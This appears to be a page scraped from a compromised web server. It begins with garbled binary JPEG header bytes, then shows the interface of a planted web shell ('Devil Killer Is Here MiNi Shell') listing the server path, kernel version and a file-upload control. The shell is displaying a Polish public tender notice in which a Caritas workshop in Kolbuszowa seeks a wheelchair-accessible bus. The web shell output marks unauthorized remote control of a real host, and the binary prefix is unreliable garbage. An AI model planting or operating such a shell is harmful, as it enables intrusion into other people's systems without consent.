JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231124/0051400701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> ZAKUP WRAZ Z DOSTAWĄ FABRYCZNIE NOWEGO AUTOBUSU PRZYSTOSOWANEGO DO PRZEWOZU OSÓB NIEPEŁNOSPRAWNYCH NA POTRZEBY WARSZTATÓW TERAPII ZAJĘCIOWEJ CARITAS DIECEZJI RZESZOWSKIEJ W KOLBUSZOWEJ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Caritas Diecezji Rzeszowskiej Warsztaty Terapii Zajęciowej w Kolbuszowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 8141591065</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tyszkiewiczów</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">733571287</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wtzkolbuszowa@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://caritas.rzeszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> kościelna osoba prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> katolicja organizacja charytatywna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZAKUP WRAZ Z DOSTAWĄ FABRYCZNIE NOWEGO AUTOBUSU PRZYSTOSOWANEGO DO PRZEWOZU OSÓB NIEPEŁNOSPRAWNYCH NA POTRZEBY WARSZTATÓW TERAPII ZAJĘCIOWEJ CARITAS DIECEZJI RZESZOWSKIEJ W KOLBUSZOWEJ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1d4be3c3-8acf-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00514007</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-1d4be3c3-8acf-11ee-9fb5-3edbb70f45bd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu platformy e-Zamówienia, która dostępna<br/>jest pod adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej.<br/>Szczegóły zawarte zostały w pkt VIII, XII Instrukcji dla wykonawców - Rozdział I SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 8 ust. 1 Dekretu ogólnego w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych w Kościele katolickim wydanego przez Konferencję Episkopatu Polski w dniu 13 marca 2018 roku, podczas 378. Zebrania Plenarnego w <br/>Warszawie, na podstawie kan. 455 Kodeksu Prawa Kanonicznego, w związku z art. 18 Statutu KEP, po uzyskaniu specjalnego zezwolenia Stolicy Apostolskiej z dnia 3 czerwca 2017 roku, Caritas Diecezji Rzeszowskiej informuje, iż: <br/>1.	Administratorem danych jest Caritas Diecezji Rzeszowskiej z siedzibą w Rzeszowie przy ul. Jana Styki 21. <br/>2.	W Caritas Diecezji Rzeszowskiej został powołany inspektor danych osobowych: Pan Bartosz Grabowy, z którym w zakresie gromadzenia i przetwarzania danych osobowych ma Pani/Pan prawo kontaktu za pomocą poczty elektronicznej pod adresem: kancelaria@adwokatgrabowy.com, a przypadkach niecierpiących zwłoki pod nr telefonu: 604 301 339. <br/>3.	Administrator danych gromadzi i przetwarza dane w zakresie działalności opiekuńczo – charytatywnej Kościoła w celu: <br/>1.	pomocy społecznej, w ty rodzinom i osobom w trudnej sytuacji życiowej oraz wyrównywania szans tych rodzin i osób, <br/>2.	ochrony i promocji zdrowia, <br/>3.	działania na rzecz osób niepełnosprawnych, <br/>4.	promocji zatrudnienia i aktywizacji zawodowej osób pozostających bez pracy i zagrożonych zwolnieniem z pracy, <br/>5.	działalności wspomagającej rozwój gospodarczy, w tym rozwój przedsiębiorczości aby przeciwdziałać bezrobociu, nauki, edukacji, oświaty i wychowania, <br/>6.	upowszechniania kultury fizycznej i sportu, zwłaszcza wśród biednych i niepełnosprawnych, <br/>7.	ekologii i ochrony zwierząt oraz ochrony dziedzictwa przyrodniczego, <br/>8.	przeciwdziałania patologiom społecznym, <br/>9.	ratownictwa i ochrony ludności, <br/>10.	pomocy ofiarom katastrof, klęsk żywiołowych, konfliktów zbrojnych i wojen w kraju i za granicą, <br/>11.	rozwijania kontaktów i współpracy pomiędzy społeczeństwami, <br/>12.	promocji i organizacji wolontariatu. <br/>4. Pani/Pana dane osobowe nie są udostępniane innym odbiorcom z wyłączeniem podmiotów do tego uprawnionych takich jak: <br/>1.	podmioty upoważnione do odbioru danych osobowych na podstawie odpowiednich przepisów prawa, <br/>2.	podmioty, które przetwarzają dane osobowe w imieniu Administratora danych na podstawie zawartej z Administratorem umowy powierzenia przetwarzania danych osobowych. <br/>5.	Pani/Pana dane osobowe po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane w celach archiwalnych i przechowywane przez okres niezbędny wynikający z przepisów i umów dotyczących archiwizowania dokumentów obowiązujących u Administratora danych. <br/>6.	Posiada Pani/Pan prawo do: <br/>1.	żądania od Administratora danych dostępu do danych osobowych; <br/>2.	sprostowania danych; <br/>3.	usunięcia danych osobowych; <br/>4.	ograniczenia przetwarzania danych osobowych; <br/>5.	wniesienia sprzeciwu wobec przetwarzania danych osobowych; <br/>6.	przenoszenia danych osobowych w dowolnym momencie wobec przetwarzania danych osobowych bez wpływu na zgodność z prawem przetwarzania, którego dokonano na podstawie zgody przed jej cofnięciem; <br/>7.	cofnięcia zgody na przetwarzanie danych osobowych; <br/>8.	wniesienia skargi do organu nadzorczego w postaci Kościelnego Inspektora Ochrony Danych</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. Administrator danych informuje, że <br/>1.	podanie danych osobowych jest dobrowolne, jednakże brak ich niekiedy uniemożliwia współpracę, udzielenie pomocy w zakresie działalności Administratora danych; <br/>2.	nie będzie zakresie udostępnionych danych podejmować zautomatyzowanych decyzji, w tym w zakresie profilowania. <br/>8. W zakresie regulacji prawnych Administrator informuje, że: <br/>1.	Dekretem Biskupa Rzeszowskiego z dnia 12 maja 1992 roku, L.dz. 240/92 utworzono <br/>Caritas Diecezji Rzeszowskiej (Administrator danych), która jest publiczną kościelną osobą prawną w rozumieniu kan. 116 §1 i §2 Kodeksu Prawa Kanonicznego. <br/>2.	Zgodnie z art. 7 ust. 2 pkt 3) ustawy z dnia 17 maja 1989 roku o stosunku Państwa do <br/>Kościoła Katolickiego w Rzeczypospolitej Polskiej (Dz.U. z 2018 r. poz. 380 j.t. z poźn. zm.) Caritas Diecezji Rzeszowskiej (Administrator danych) jest osobą prawną. <br/>3.	Na podstawie art. 91 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/we (Ogólne Rozporządzenie o Ochronie Danych) (Dz.Urz.UE.l nr 119, str. 1), jeżeli w państwie członkowskim w momencie wejścia w/w rozporządzenia w życie kościoły i związki lub wspólnoty wyznaniowe stosują szczegółowe zasady ochrony osób fizycznych w związku z przetwarzaniem, zasady takie mogą być stosowane, pod warunkiem, że są dostosowane do przedmiotowego rozporządzenia. <br/>9. Konferencja Episkopatu Polski w dniu 13 marca 2018 roku podczas 378 Zebrania Plenarnego w Warszawie, na podstawie kan. 455 Kodeksu Prawa Kanonicznego, w związku z art. 18 Statutu Konferencji Episkopatu Polski, po uzyskaniu specjalnego zezwolenia Stolicy Apostolskiej z dnia 3 czerwca 2017 roku wydała Dekret ogólny w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych w <br/>Kościele katolickim, który w art. 4 stanowi, iż przepisy dekretu stosuje się do publicznych kościelnych osób prawnych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">L.Dz. 205/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest „Zakup wraz z dostawą fabrycznie nowego wyprodukowanego nie wcześniej niż w 2023 roku autobusu, z liczbą pasażerów 19 + kierowca, przystosowanego do przewozu osób niepełnosprawnych w tym na wózku inwalidzkim na potrzeby Warsztatów Terapii Zajęciowej Caritas Diecezji Rzeszowskiej w Kolbuszowej”. <br/>2.	Miejscem dostawy jest: Warsztaty Terapii Zajęciowej Caritas Diecezji Rzeszowskiej w Kolbuszowej, ul. Tyszkiewiczów 3, 36-100 Kolbuszowa <br/>3.	Przedmiot zamówienia jest dofinansowany ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych – w ramach obszaru D programu pn.: „Program wyrównywania różnic między regionami III rok 2023” <br/> <br/>Parametry techniczne przedmiotu zamówienia i wymagania jakościowe odnoszące się do głównych elementów przedmiotu zamówienia zgodnie z art99 i następne uPzp – określa poniższy Opis przedmiotu zamówienia: <br/> <br/>A. NADWOZIE: <br/>-	nadwozie typu autobus, liczba miejsc dla pasażerów – 19 + kierowca, w tym przystosowane 1 miejsce dla wózków inwalidzkich z tyłu autobusu z opcją demontażu foteli tylnych co umożliwi transport osób niepełnosprawnych na wózkach inwalidzkich w specjalnie przystosowanym stanowisku wózka inwalidzkiego. Stanowisko wózka homologowane wyposażone w specjalne szyny, pasy, pasy bezpieczeństwa dla osoby niepełnosprawnej oraz najazdy umożliwiające wprowadzenie wózka inwalidzkiego. Nadwozie całkowicie przeszklone z fabrycznymi drzwiami bocznymi przesuwanymi (prawe) otwieranymi elektrycznie poprzez oryginalny mechanizm. Autobus fabrycznie nowy rok produkcji min 2023 sprawny technicznie, wolny od wad konstrukcyjnych co będzie potwierdzone homologacją i przeglądem przedsprzedażnym, <br/>-	szyby panoramiczne gięte, pojedyncze, przyciemniane, <br/>-	szyba czołowa przyciemniana z filtrem, <br/>-	osłona przeciwsłoneczna dla kierowcy i pasażera + półki nad przednią szybą, <br/>-	stopień drzwi bocznych przy drzwiach przesuwanych wysuwany elektrycznie, <br/>-	kolor do wyboru po rozstrzygnięciu oferty ze standardowej palety producenta <br/>-	wysokość przestrzeni pasażerskiej minimum 1850 mm, <br/>-	elektrycznie regulowane i podgrzewane lusterka zewnętrzne z kierunkowskazami, <br/>-	elektrycznie opuszczane szyby w drzwiach przednich fabryczne, <br/>-	przeźroczysta zasłona za kierowcą + bariera z poręczą za kierowcą, <br/>-	drzwi tylne dwuskrzydłowe, z przeszkleniem, otwierane na min 180 stopni, <br/>-	zawieszenie fabrycznie wzmocnione, <br/>-	rozstaw osi minimum 4300 mm, <br/>-	długość całkowita minimum 7300 mm <br/>-	dopuszczalna masa całkowita minimum 5000 kg. <br/> <br/>B.	SILNIK: wysokoprężny diesla, o pojemności minimum 1950 cm3, moc silnika minimum 175 KM, wersja silnika EURO VI, zbiornik paliwa min. 80 litrów. <br/> <br/>C.	BEZPIECZEŃSTWO: <br/>-	system zapobiegający zablokowaniu się kół podczas hamowania ABS i elektroniczny system podziału siły hamowania EBV, <br/>-	system optymalizacji przyczepności podczas przyspieszania ASR, <br/>-	system stabilizacji toru jazdy ESP, <br/>-	hamulce tarczowe na przedniej i tylnej osi, <br/>-	układ hamulcowy hydrauliczny dwu obwodowy, <br/>-	hamulec postojowy, <br/>-	poduszka powietrzna dla kierowcy, <br/>-	poduszka powietrzna dla pasażera. <br/><br/>D. UKŁAD PRZENIESIENIA NAPĘDU: <br/>-	napęd na koła tylne, <br/>-	koła bliźniacze z tyłu. <br/> <br/>E. UKŁAD KIEROWNICZY: <br/>-	układ kierowniczy ze wspomaganiem, <br/>-	kolumna kierownicy regulowana w dwóch płaszczyznach, - blokada koła kierownicy. <br/> <br/>F. KOŁA/OPONY: <br/>-	koła i ogumienie na samochodzie: minimum R16 C, - koło zapasowe pełnowymiarowe umieszczone pod ramą, - drugi komplet kół z oponami zimowymi (felgi z oponami), <br/>-	ogumienie bezdętkowe. <br/> <br/>G. WYPOSAŻENIE FUNKCJONALNE: <br/>-	centralny zamek sterowany falami radiowymi, <br/>-	alarm antywłamaniowy, <br/>-	fabryczny immobiliser, <br/>-	przednia szyba ogrzewana, <br/>-	trzecie światło stop z tyłu pojazdu + światła boczne obrysowe, <br/>-	lusterko wsteczne wewnętrzne, - gniazdo 12V, <br/>-	kamera cofania z wyświetlaczem, <br/>-	lampy przeciwmgielne przednie z funkcją doświetlania zakrętów, - lampy przeciwmgielne tylne, <br/>-	światła wsteczne, <br/>-	chlapacze przód i tył, <br/>-	siedzenie kierowcy komfortowe hydraulicznie resorowane + podłokietnik, - napinacze pasów 3-pkt dla kierowcy, <br/>-	poręcze ułatwiające wsiadanie i wysiadanie pasażerów z autobusu, <br/>-	zasłonki przeciwsłoneczne w oknach przesuwane na szynie, <br/>-	izolacja dźwiękowo termiczna przedziału pasażerskiego, <br/>-	światła tylne awaryjne, <br/>-	oznakowanie pojazdu „przewóz osób niepełnosprawnych”, <br/>-	kompletne 1 stanowisko wózka inwalidzkiego, pasy 4 pkt do mocowania wózka, pasy 2 pkt do mocowania pasażera, <br/>-	najazdy służące do wprowadzania wózka inwalidzkiego. <br/> <br/>H. PRZESTRZEŃ PASAŻERSKA: <br/>-	zamontowanie ramek okiennych (parapety i słupki okienne) z tworzywa ABS (łatwo zmywalne), a ściany podokienne wraz z sufitem pokryte tapicerką, <br/>-	tapicerka z izolacją termiczną, <br/>-	oświetlenie przestrzeni pasażerskiej dzień, noc, + elektroniczny panel sterujący natężeniem, <br/>-	podświetlony stopień wejścia, <br/>-	podłoga płaska na całym pojeździe z materiału antypoślizgowego, <br/>-	szyberdach – wyjście awaryjne homologowane, <br/>-	montaż foteli sztywne homologowane, 3-pkt pasy bezpieczeństwa, podłokietniki regulowane, uchwyt, zagłówek, <br/>-	wybijaki do szyb zamontowane na słupkach bocznych, oznaczenie wyjść awaryjnych, - fotele tylne demontowane w celu transportu osób na wózkach inwalidzkich, - wentylator nadmuchowy i wyciągowy. <br/> <br/>I. WYPOSAŻENIE DODATKOWE: <br/>-	skrzynia biegów manualna co najmniej 6-biegowa (6 biegów do przodu), <br/>-	elektryczne sterowanie drzwi przesuwnych ( prawe) <br/>-	radioodtwarzacz z USB i wzmacniaczem, mikrofon z przełącznikiem, przewód spiralny i uchwyt mikrofonu, <br/>-	głośniki w przedniej części autobusu, <br/>-	głośniki w przestrzeni pasażerskiej min 4 szt. <br/>-	klimatyzacja przedziału kierowcy oryginalna, <br/>-	klimatyzacja dachowa części pasażerskiej z wydmuchem centralnym min. 5kW, - ogrzewanie wodne postojowe ze sterownikiem przestrzeni pasażerskiej z konwektorami na ścianach bocznych, <br/>-	homologowany ogranicznik prędkości do 100 km/h, <br/> - tachograf cyfrowy, <br/>-	zagłówek kierowcy i pasażera regulowany na wysokość, <br/>-	szybkościomierz ze skalą w kilometrach, <br/>-	wskaźnik temperatury zewnętrznej, <br/>-	czujnik światła i deszczu, <br/>-	regulacja zasięgu reflektorów, <br/>-	kontrolka zużycia płynu do spryskiwaczy, <br/>-	kontrolka zużycia klocków hamulcowych, <br/>-	kontrolka awarii oświetlenia pojazdu, <br/>-	apteczka, 2 gaśnice, trójkąt, klin pod koła, podnośnik hydrauliczny samochodowy wraz z kluczem do demontażu kół, dodatkowa apteczka autobusowa, <br/>-	kompletne przystosowanie pojazdu do przewozu 1 miejsc na wózkach inwalidzkich „szybki montaż” zgodnie z obowiązującymi normami i przepisami. <br/>-	dokumenty w języku polskim: <br/>a)	instrukcja użytkowania; <br/>b)	karta gwarancyjna; <br/>c)	książka serwisowa; <br/>d)	informacje dotyczące serwisu autoryzowanego w okresie gwarancyjnym i pogwarancyjnym; <br/> <br/>J.	GWARANCJA: <br/>-	minimum 2 lata gwarancji na cały pojazd z wyposażeniem (baza + zabudowa) bez limitu kilometrów, <br/>-	minimum 2 lata gwarancji na powłokę lakierniczą, <br/>-	minimum 6 lat gwarancji na perforację nadwozia. <br/> <br/>Istnieje możliwość zaoferowania dodatkowej gwarancji (zgodnie z Rozdziałem XIX), przez co można uzyskać dodatkowe max. 30 pkt w kryterium – Gwarancja. <br/> <br/>K.	WYMAGANIA DODATKOWE: <br/>-	pełna dokumentacja umożliwiająca pierwszą rejestrację pojazdu w kategorii Autobus – pełna homologacja Autobusowa dla osób niepełnosprawnych, oraz misi spełniać warunki zawarte Rozporządzeniu Ministra Infrastruktury z dnia 31.02.2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia ( Dz. U. z 2016 r., poz.2022 ze zm.) <br/>-	wszelkie zastosowane materiały i wyposażenie powinny posiadać odpowiednie certyfikaty, homologacje oraz powinny spełniać normy i przepisy w przewozie osobowym i osób niepełnosprawnych. <br/>-	Wykonawca zobowiązany jest zapewnić serwis gwarancyjny przez Autoryzowane <br/>Stacje Obsługi w odległości do maksymalnie 100 km od WTZ Caritas Kolbuszowa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34121000-1 - Autobusy i autokary</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w<br/>dokumentach zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span 